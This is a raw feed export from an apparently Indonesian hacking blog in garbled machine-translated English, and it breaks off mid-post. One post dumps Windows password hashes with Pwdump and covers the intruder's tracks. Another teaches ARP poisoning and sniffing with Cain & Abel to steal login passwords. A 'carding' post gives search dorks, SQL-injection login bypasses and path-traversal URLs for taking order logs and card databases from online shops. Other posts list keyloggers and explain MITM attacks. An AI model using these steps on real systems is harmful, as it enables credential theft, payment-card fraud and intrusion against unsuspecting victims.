href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2Gs1cxMHI/AAAAAAAAAMc/9Yxd5skE-T8/s1600-h/t.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 1px; height: 1px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2Gs1cxMHI/AAAAAAAAAMc/9Yxd5skE-T8/s320/t.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5367594435715608690" /&gt;&lt;/a&gt;&lt;br /&gt;After that Pwdump copy to the target computer in the temporary folder, 'temp'. After successful in-Pwdump copy to the target computer, run the command Pwdump&lt;br /&gt;&lt;br /&gt;     C: \ temp \ Pwdump-o pass.txt 127.0.0.1&lt;br /&gt;&lt;br /&gt;How successful will appear in the image below.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sn2HtlI1sEI/AAAAAAAAAMs/qJUwiw74qGA/s1600-h/dump1.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 274px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/Sn2HtlI1sEI/AAAAAAAAAMs/qJUwiw74qGA/s320/dump1.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5367595548028547138" /&gt;&lt;/a&gt;&lt;br /&gt;Then copy the files to the computer we pass.txt&lt;br /&gt;&lt;br /&gt;     C: \ temp \ copy pass.txt z:&lt;br /&gt;&lt;br /&gt;And last, do not leave the impression that we have come by over there.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2IMFpkGNI/AAAAAAAAAM0/ba_iUFv2Svg/s1600-h/clean.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2IMFpkGNI/AAAAAAAAAM0/ba_iUFv2Svg/s320/clean.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5367596072151816402" /&gt;&lt;/a&gt;&lt;br /&gt;Nah, I can be a result of its files. Living in the crack only .... (see previous article for nge-crack password).&lt;br /&gt;&lt;br /&gt;In fact many can dioprek from metasploit. Metasploit in many exploit, payload, meterpreter, etc. a very 'fun' to dioprek. To learn metasploit, disitusnya there is documentation of the rather good.&lt;br /&gt;&lt;br /&gt;Happy Hacking ... ..&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Some suggestions so that we remain safe windows to exploit above.&lt;br /&gt;&lt;br /&gt;1. Do not use Internet Explorer. Use Mozilla Firefox or Opera.&lt;br /&gt;&lt;br /&gt;2. Patch your Windows.&lt;br /&gt;&lt;br /&gt;3. Use anti-virus with latest update&lt;br /&gt;&lt;br /&gt;4. heart2 friend of your own .. alert!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2504651648084510132?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://chaidir.wordpress.com/2006/11/14/belajar-hack-yuck-bagian-3-2/' title='Study Hack Yuck! (3) - Hack Windows XP SP2'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2504651648084510132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/study-hack-yuck-3-hack-windows-xp-sp2.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2504651648084510132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2504651648084510132'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/study-hack-yuck-3-hack-windows-xp-sp2.html' title='Study Hack Yuck! (3) - Hack Windows XP SP2'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2FNW93rGI/AAAAAAAAAMM/Cp3l1aewPBU/s72-c/main1.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-360032647983410501</id><published>2009-07-25T03:50:00.000-07:00</published><updated>2009-10-08T05:38:11.431-07:00</updated><title type='text'>Collection 63 Keylogger Options</title><content type='html'>For the lamerz maniak certain hacking tools often hear Keylogger. : D. What is a Keylogger? Keylogger is a tool that basically has a function for monitoring all akitivitas done by the user on a PC. Start of recording password that diketikan, chatting on instant messaging, programs are executed by the user, what the user on the program, and all the diketikkan on the keyboard to mouse movement, and even some of the Keylogger has been long outstanding include facilities pengcapture screen monitor once every 5 minutes, and the output is &lt;span class="fullpost"&gt;HTML. There are quite a few interesting Keylogger, among which there can send the results of monitoring activities to the investor email Keylogger is. So that the grower Keylogger can see all the activities done by the user on a pc via email.&lt;br /&gt;Clearly this is controversial Keylogger as 2 blade, positive, negative, build and destroy. Not enough time to discuss all this.&lt;br /&gt;Add to your collection of hacking tools,: D, please download the latest 63 Keylogger is powerful ...&lt;br /&gt;&lt;br /&gt;Following list:&lt;br /&gt;1. 007 Keylogger Spy Software 3873&lt;br /&gt;2. Active Key logger 2.4&lt;br /&gt;3. Activity Keylogger 1.80.21&lt;br /&gt;4. Activity logger 3.7.2132&lt;br /&gt;5. ActMon Computer Monitoring 5:20&lt;br /&gt;6. Actual Spy 2.8&lt;br /&gt;7. Advanced Invisible Keylogger V1.9&lt;br /&gt;8. Advanced Keylogger 1.8&lt;br /&gt;9. Ardamax Keylogger 2.9&lt;br /&gt;10. BlazingTools Perfect Keylogger 1.68&lt;br /&gt;11. Remote Blazingtools logger v2.3&lt;br /&gt;12. Data Doctor Keylogger Advance v3.0.1.5&lt;br /&gt;13. Local Keylogger Pro 3.1&lt;br /&gt;14. ExploreAnywhere Keylogger Pro 1.7.8&lt;br /&gt;15. Family Cyber Alert 4:06&lt;br /&gt;16. Family Keylogger 2.80&lt;br /&gt;17. Firewall bypass Keylogger 1.5&lt;br /&gt;18. Free Keylogger 2:53&lt;br /&gt;19. Ghost Keylogger 3.80&lt;br /&gt;20. Golden Eye 4.5&lt;br /&gt;21. Golden Keylogger 1:32&lt;br /&gt;22. Handy Keylogger 3:24 build 032&lt;br /&gt;23. Home Keylogger 1.77&lt;br /&gt;24. Inside Keylogger 4.1&lt;br /&gt;25. iOpus Starr PC and Internet Monitor 3:23&lt;br /&gt;26. iSpyNow v2.0&lt;br /&gt;27. KeyScrambler 1.3.2&lt;br /&gt;28. Keystroke Spy 1:10&lt;br /&gt;29. KGB Keylogger 4.2&lt;br /&gt;30. KGB Spy 3.84&lt;br /&gt;31. LastBit Absolute Key logger 2.5.283&lt;br /&gt;32. Metakodix Stealth Keylogger 1.1.0&lt;br /&gt;33. Network Event Viewer v6.0.0.42&lt;br /&gt;34. OverSpy v2.5&lt;br /&gt;35. PC Activity Monitor Professional 7.6.3&lt;br /&gt;36. PC Spy Keylogger 2.3 build 0313&lt;br /&gt;37. PC Weasel 2.5&lt;br /&gt;38. Personal PC Spy v1.9.5&lt;br /&gt;39. Power Spy 6:10&lt;br /&gt;40. Powered Keylogger v2.2.1.1920&lt;br /&gt;41. Quick Keylogger 2.1&lt;br /&gt;42. Radar 1.0&lt;br /&gt;43. Real Spy Monitor 2.80&lt;br /&gt;44. Real Spy Monitor 2.80&lt;br /&gt;45. Remote Desktop Spy 4:04&lt;br /&gt;46. Remote Keylogger 1.0.1&lt;br /&gt;47. Revealer Keylogger Free 1:33&lt;br /&gt;48. SC Keylogger Pro 3.2&lt;br /&gt;49. Smart keystroke Recorder Pro&lt;br /&gt;50. Spector Pro 6.0.1201&lt;br /&gt;51. SpyAnytime PC Spy 2:42&lt;br /&gt;52. SpyBuddy 3.7.5&lt;br /&gt;53. Spytech SpyAgent 6:02:07&lt;br /&gt;54. Spytector 1.3.5&lt;br /&gt;55 Stealth Key logger 4.5&lt;br /&gt;56. System Keylogger 2.0.0&lt;br /&gt;57. Tim's Keylogger 1.0&lt;br /&gt;58. Tiny Keylogger 2.0&lt;br /&gt;59. Total Spy 2.7&lt;br /&gt;60. Windows Keylogger 5:04&lt;br /&gt;61. Win-Spy Pro 8.9.109&lt;br /&gt;62. XP Advanced Keylogger 2.5&lt;br /&gt;63. XPCSpy Pro version 3:01 &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-360032647983410501?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/360032647983410501/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/collection-63-keylogger-options.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/360032647983410501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/360032647983410501'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/collection-63-keylogger-options.html' title='Collection 63 Keylogger Options'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3353177415676254557</id><published>2009-07-25T03:46:00.000-07:00</published><updated>2009-10-08T05:37:53.361-07:00</updated><title type='text'></title><content type='html'>LAN Hacking tutorial (Create a Newbie who want to learn hack)&lt;br /&gt;How to hacking via the LAN (to steal a pass people browsing)&lt;br /&gt;First of all sorry I repost this technique because the technique is not fresh in the world of hacking, but this technique has not been stale because up to now can still be used because most network meggunakan network hub &amp; switch that does not terenkripsi.Mengapa not encrypted?&lt;br /&gt;* Network Admin is the person most of the IT specialist in making the program, not in Network Security * If the encrypted bandwidth will need &lt;span class="fullpost"&gt;inet increased and of that already this lemot akan lemot and finally the error page * price is not cheap to obtain the encrypted&lt;br /&gt;The difference between the Hub and Switch network:&lt;br /&gt;* At the network hub of all data that flows in the network can be viewed / retrieved by any computer on the network asalakan computer merequest data, I do not direquest will not come .* The network switch that the computer only to exchange data to see data , the other komputer2 not entitled merequest data.&lt;br /&gt;The problem is the price of the hub router and switch does not differ greatly so most places are now using the method to make the switch network hacking.&lt;br /&gt;Hacking using this technique:&lt;br /&gt;* * Sniffing ARP Poison Routing&lt;br /&gt;The two techniques above will not be prevented by a firewall on any computer of the victim, guaranteed.&lt;br /&gt;Important Note: ARP Poison Routing can meyebabkan denial of service (dos) on one of / all the computers on your network&lt;br /&gt;Advantages:&lt;br /&gt;* Not detected by the firewall types and any series because kelemahannya located on the network system not on the computer * can steal all of the login password via the HTTP server * can steal all the login password of the Hub in the network is activated during the program * To ARP poisoning can be used to steal your password in the HTTPS * All programs free&lt;br /&gt;Disadvantages:&lt;br /&gt;* To be at Switch network ARP poisoning at 1 and bandwidth you will be eaten accidentally much for it (I inet super fast ga problems) * discovered not by the network admin outside my responsibilities&lt;br /&gt;Start from here that's in the network in this story have 3 computers, which are:&lt;br /&gt;* Victims * Computers * Computer Hacker Server&lt;br /&gt;Differences between the network switch and a network hub: The first step:&lt;br /&gt;1. Check your network type, you have the network switch / hub. If you are in the network hub be grateful because the process of hacking you will be far more mudah.2. Download the programs that is needed Wireshark and Cain &amp; Abel.Code:&lt;br /&gt;http://www.wireshark.org/download.htmlhttp://www.oxid.it/cain.html&lt;br /&gt;How to Use WireShark:&lt;br /&gt;* Run the program wireshark * Press Ctrl + k (option-click capture ago) * Make sure the content is Interfacenya your Ethernet card for the network, if not change and make sure that "Capture packets in promiscuous mode" * Click on the button start * Click the stop button after you are sure that no password is entered for you to press the start button you can see all types of the packet in the incoming and outgoing network (or on your computer only if you use a network Swtich * To analyze the data is right-click on the data want in the analysis and click "Follow TCP Stream" and congratulations to analyze paketnya (I will not explain how because I can not) * What's clear from the data is definitely in there informasi2 entered the victim to the website and vice versa&lt;br /&gt;How the above applies only if your network is not the Hub switchDari on how you can know that your network is a hub / switch with a view in the IP Source and Destination IP. When the line on every one of them is the ip then you can be your network is a network switch, if I do not mean otherwise.&lt;br /&gt;How to Use Cain &amp; Abel:&lt;br /&gt;* The use of this program is much easier and simple than using wireshark, but if you want a packet of all exit and entry is recommended you use the wireshark program * Open the program you Cain * Click on the configure * In the "Sniffer" select ethernet card akan you use * In the "HTTP Fields" you must add a username and password fields when its fields you want is not in daftar.Sebagai example, I will inform you that I want to hack password Friendster you need to add the username in the fields and fields passworsd word name , to the other you can find it by pressing the right click view source and you should find a variable input login and password from the website. Which is already in default rasanyan already full enough, you can steal a pass in there without adding any klubmentari .* After that settingannya apply and click ok * In the main menu there are 8 tabs, and will be discussed only 1 tab is the tab "Sniffer" Therefore, select the tab and it should not pindah2 of the tab to prevent confusion * Activate your own Sniffer with sniffer clicking the button on the top tab2, the search for the key writings that "Start / Stop Sniffer" * If you have time in the network hub This you already know the password can be entered with a click on the tab (The tab on the bottom that is not in the middle, which is the no-click-clicked again) "Passwords" you choose a password from the connection which you want to see akan already registered there * If you have appeared on the network switch, this requires more struggle, you must activate the APR tombolonya have the right Sniffer (And this does not guarantee successful manage because of the switch is far more comprehensive &amp; secure from the hub) * Before the activated the sniffer tab select the bottom of the APR * 2 will be seen that the list is empty, click on the top of the list is empty and then click the "+" (such as the form) that is in the range key sniffer APR etc. * There will be 2 fruit which contains all the field the host on your network * Connect the victims ip address ip address and gateway servers (to know the address of the gateway server on the computer click start you select run and type cmd type ipconfig in the command prompt) * Once the new switch the APR, and all the data from victim to the server computer you can see in the same way.&lt;br /&gt;You can run both programs simultaneously in the top (for APR Cain and wireshark for packet sniffing) when you want a more maximum results.&lt;br /&gt;Password that you can steal the password of the HTTP server (the server that is not encrypted), if the data is encrypted on the server that you have to mendekripsi data obtained before the password (and that will require that STEP 2 is much more of how long this hack )&lt;br /&gt;For terms that are not ngerti can be searched on wikipedia (but that is what the English indo jg not have).&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3353177415676254557?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3353177415676254557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/lan-hacking-tutorial-create-newbie-who.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3353177415676254557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3353177415676254557'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/lan-hacking-tutorial-create-newbie-who.html' title=''/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7521251981873827810</id><published>2009-07-25T03:28:00.000-07:00</published><updated>2009-10-08T05:37:38.358-07:00</updated><title type='text'>Recognize The Man-In-The-Middle (MITM)</title><content type='html'>Many articles that discuss the techniques ilmuhacking attack man in the middle (mitm), but I have never been explained in detail about what it mitm attack. Mitm attack is a type of attack is extremely dangerous and can happen anywhere, in the website, mobile phone, as well as in the traditional communication tools such as correspondence. Therefore, I think one needs to have a special article that discusses mitm attack irrespective of any technical implementation and &lt;span class="fullpost"&gt;&lt;br /&gt;wherever.&lt;br /&gt;&lt;br /&gt;Not Sekedar Sniffing&lt;br /&gt;&lt;br /&gt;Many may think that the goal of the attack mitm is to extract confidential data communications, such as sniffing. Sniffing can be called a passive attack, because in the sniffing attacker does not do any action other than monitoring the data through. It is true that the attack mitm, an attacker can find out what is discussed by the two parties to communicate. But actually the biggest strength of mitm not the ability sniffingnya, but on the ability to intercept and change communications mitm attack can be so called as the type of active attack.&lt;br /&gt;&lt;br /&gt;Picture below is a scenario that can be done with the attacker attacks mitm.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Smrelh2ydHI/AAAAAAAAAKw/CAvqp8T0L8k/s1600-h/mitm_scenario1-300x206.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 300px; height: 206px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Smrelh2ydHI/AAAAAAAAAKw/CAvqp8T0L8k/s320/mitm_scenario1-300x206.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5362343042662691954" /&gt;&lt;/a&gt;&lt;br /&gt;In the picture shown is the 4 types of attacks can be done with the MITM. Here is an explanation of the types of attacks in a scenario such as the image above.&lt;br /&gt;&lt;br /&gt;     * Sniffing: Charlie knows all discussion between Alice and Bob.&lt;br /&gt;     * Intercepting: Charlie intercept a message from Alice when Alice wanted to close the conversation with "Bob I'm going to sleep, Bye!". This way Bob thinks Alice is communicating with.&lt;br /&gt;     * Tampering: Charlie answers change from Bob to Alice bob Paypal account to be charlie.&lt;br /&gt;     * Fabricating: Charlie asks the social security number to Bob, when this question was never asked by Alice.&lt;br /&gt;&lt;br /&gt;Mitm with how this could be how large the potential damage that can be done Charlie to Alice and Bob.&lt;br /&gt;&lt;br /&gt;The attack is the Man-in-The-Middle&lt;br /&gt;&lt;br /&gt;Mitm in the attack, an attacker will be in the midst of the communications between two parties. The whole discussion going on between them should be through the first attacker in the middle. Attacker with a lavish do tapping, pencegatan, conversion even forge communication as I have described previously.&lt;br /&gt;&lt;br /&gt;Now let us see the example of a MITM in case Alice communicates with Bob. Charlie as the attacker will try to be in the middle between Alice and Bob. In order for Charlie to be successful the people, then Charlie should:&lt;br /&gt;&lt;br /&gt;     * Masquerade as Bob before Alice&lt;br /&gt;     * Masquerade as Alice before Bob &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Smre34ecsUI/AAAAAAAAAK4/qjzLbS9sn1g/s1600-h/mitm_flow-300x191.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 300px; height: 191px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Smre34ecsUI/AAAAAAAAAK4/qjzLbS9sn1g/s320/mitm_flow-300x191.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5362343357972263234" /&gt;&lt;/a&gt;&lt;br /&gt;In mitm, suppose Alice are talking with Bob, but that he was talking with Charlie. Bob Similarly, he thinks are talking with Alice, when, in fact that he was talking with Alice. So that people can be in the middle of Charlie can be incognito in the two sides, not only on one side only.&lt;br /&gt;&lt;br /&gt;Why Alice and Bob can be trapped and deceived by Charlie? That is because Alice and Bob does not perform authentication before communication. Alice ensure authentication akan Bob spoke with the original, not the fake Bob diperankan by Charlie. As well as authentication, Bob will speak with the original Alice, Alice is not a false diperankan by Charlie.&lt;br /&gt;&lt;br /&gt;Importance of Authentication: Who Are You Speaking With?&lt;br /&gt;&lt;br /&gt;Authentication is the process to prove the identity of a subject, can the person or machine. The process of proving identity seeorang there are many ways, but all can be grouped in 3 categories:&lt;br /&gt;&lt;br /&gt;     * What you know: a PIN, password, public key-pair private&lt;br /&gt;     * What you have: smart card, key, USB dongle&lt;br /&gt;     * What you are: fingerprint, retina&lt;br /&gt;&lt;br /&gt;In short the authentication question "Who are you speaking with?". The question is very important note before the two parties to communicate. When the two parties to communicate without prior authentication, they can be stuck talking with the wrong people, namely people who masquerade be talking opponents. If this happens then the consequences can be fatal, one of which is the occurrence of mitm attack.&lt;br /&gt;&lt;br /&gt;When two people who already know each other face-to-face talk with directly, then they may not get stuck talking to the misguided and the wrong people. Authentication becomes very important when both parties talk through the media of communication such as long distance telephone or internet. In long-distance communication, we can only hear us talk opponents, so very likely we are talking with the wrong people.&lt;br /&gt;&lt;br /&gt;So how to prevent the MITM attack is to perform authentication before communication. Even if authentication is done by one party only, it is sufficient to prevent mitm. Let us see again the example Alice, Bob and Charlie, if the authentication is only done by Bob, while Alice does not. Because of the absence of authentication Alice, then Charlie can masquerade as Alice in front of Bob, but Charlie can not masquerade as Bob in front of Alice. What Charlie can not disguise a Bob? For Alice akan Bob test the authenticity of the authentication, so that masquerade as Bob Charlie uncovered false akan akan and Alice does not want to continue communication.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7521251981873827810?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7521251981873827810/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/recognize-man-in-middle-mitm.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7521251981873827810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7521251981873827810'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/recognize-man-in-middle-mitm.html' title='Recognize The Man-In-The-Middle (MITM)'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/Smrelh2ydHI/AAAAAAAAAKw/CAvqp8T0L8k/s72-c/mitm_scenario1-300x206.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2771213714368552477</id><published>2009-07-25T03:24:00.000-07:00</published><updated>2009-10-08T05:37:20.129-07:00</updated><title type='text'>Disclaimer</title><content type='html'>In a related site with so many controversial topics and skills, it is important to anticipate the incident and implement the provisions of the agreement and the service users. We want to provide a free place to learn, safe and legal for users of this site.&lt;br /&gt;&lt;br /&gt;By reading this site, you agree to the following conditions:&lt;br /&gt;&lt;br /&gt;    1. All information available on this site is for educational purposes only. This site is not responsible for the misuse of any information.&lt;br /&gt;    2. "Science Hacking" is a title that reflects the content of the site and not a site that provides all the information illegally. IlmuHacking.com is &lt;span class="fullpost"&gt;a site related to Computer Security, and not a site that promotes hacking / cracking.&lt;br /&gt;    3. This site is really intended to provide information about "Network Security" and other topics related and not related to the term "cracking" or "HACKING" (which is unethical).&lt;br /&gt;    4. Some articles (posts) at this site that contains information related to "Hacking Password" or "Hacking Email Account" (or similar term) is not a Hacking guide. Articles that only provide information about the valid password to get back lost / forgotten.&lt;br /&gt;    5. All information on this site is intended to develop the attitude "Hacker Defense" between the user and to help prevent attacks. IlmuHacking.Com prohibit the use of this information for any damage caused directly or indirectly.&lt;br /&gt;    6. The word "Hack" or "Hacking" which is used on this site should be defined as "Ethical Hack" or "Ethical Hacking".&lt;br /&gt;    7. Some of the tricks provided by us may no longer work because of improvements to the bug that allows exploits. We are not responsible for any damages directly or indirectly caused by the use of hacks provided on this site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2771213714368552477?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2771213714368552477/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/07/disclaimer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2771213714368552477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2771213714368552477'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/07/disclaimer.html' title='Disclaimer'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2810155816878140070</id><published>2009-07-22T01:35:00.000-07:00</published><updated>2009-10-08T05:37:06.378-07:00</updated><title type='text'>Engineering carding</title><content type='html'>1. example in the form of bugs shopadmin shop system:&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;Google.com Type: -&gt; allinurl: / shopadmin.asp&lt;br /&gt;Sample target: www.xxxxxx.com / shopadmin.asp&lt;br /&gt;The weakness of this system if criminals enter the &lt;span class="fullpost"&gt;&lt;br /&gt;code injection, such as:&lt;br /&gt;user: 'or'1&lt;br /&gt;pass: 'or'1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;2. example in the form of bugs shop system: Index CGI&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com: Type -&gt; allinurl: / store / index.cgi / page =&lt;br /&gt;Sample target: www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm&lt;br /&gt;Delete and replace with short_blue.htm -&gt; .. / admin / files / order.log&lt;br /&gt;The result: www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/&lt;br /&gt;order.log&lt;br /&gt;&lt;br /&gt;3. example in the form of bugs shop system: metacart&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com allinurl: / metacart /&lt;br /&gt;Sample target: www.xxxxxx.com / metacart / about.asp&lt;br /&gt;Moreinfo.asp Remove and replace with -&gt; / database / metacart.mdb&lt;br /&gt;The result: / www.xxxxxx.com / metacart / database / metacart.mdb&lt;br /&gt;&lt;br /&gt;4. example in the form of bugs shop system: DCShop&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com: Type -&gt; allinurl: / DCShop /&lt;br /&gt;Example: www.xxxxxx.com / xxxx / DCShop / xxxx&lt;br /&gt;Remove / DCShop / xxxx and replace with -&gt; / DCShop / orders / orders.txt&lt;br /&gt;or / DCShop / Orders / orders.txt&lt;br /&gt;The result: www.xxxx.com / xxxx / DCShop / orders / orders.txt&lt;br /&gt;&lt;br /&gt;5. example in the form of bugs shop system: PDshopro&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google.com: Type -&gt; allinurl: / shop / category.asp / catid =&lt;br /&gt;Example: www.xxxxx.com/shop/category.asp/catid=xxxxxx&lt;br /&gt;Remove / shop / category.asp / catid = xxxxx dang replace with -&gt; / admin /&lt;br /&gt;dbsetup.asp&lt;br /&gt;The result: www.xxxxxx.com / admin / dbsetup.asp&lt;br /&gt;From above description, we will see a file with a database name&lt;br /&gt;sdatapdshoppro.mdb&lt;br /&gt;Download file sdatapdshoppro.mdb with the url into its&lt;br /&gt;www.xxxxxx.com / data / pdshoppro.mdb&lt;br /&gt;Open the page file use Microsoft Access (the database to read&lt;br /&gt;access.mdb should aja pake ms access)&lt;br /&gt;&lt;br /&gt;6. example in the form of bugs shop system: commerceSQL&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google: Type -&gt; allinurl: / commercesql /&lt;br /&gt;Example: www.xxxxx.com / commercesql / xxxxx&lt;br /&gt;Remove commercesql / xxxxx and replace with -&gt;&lt;br /&gt;cgi-bin/commercesql/index.cgi? page =&lt;br /&gt;The result: www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page =&lt;br /&gt;To view the admin config -&gt;&lt;br /&gt;www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl&lt;br /&gt;To view the admin manager -&gt;&lt;br /&gt;www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi&lt;br /&gt;To view the log file / CCnya -&gt;&lt;br /&gt;www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order ...&lt;br /&gt;&lt;br /&gt;7. example in the form of bugs shop system: eShop&lt;br /&gt;example shop will appear on search engines when some mengetikan&lt;br /&gt;keyword, such as:&lt;br /&gt;google: Type -&gt; allinurl: / eShop /&lt;br /&gt;Example: www.xxxxx.com / xxxxx / eShop&lt;br 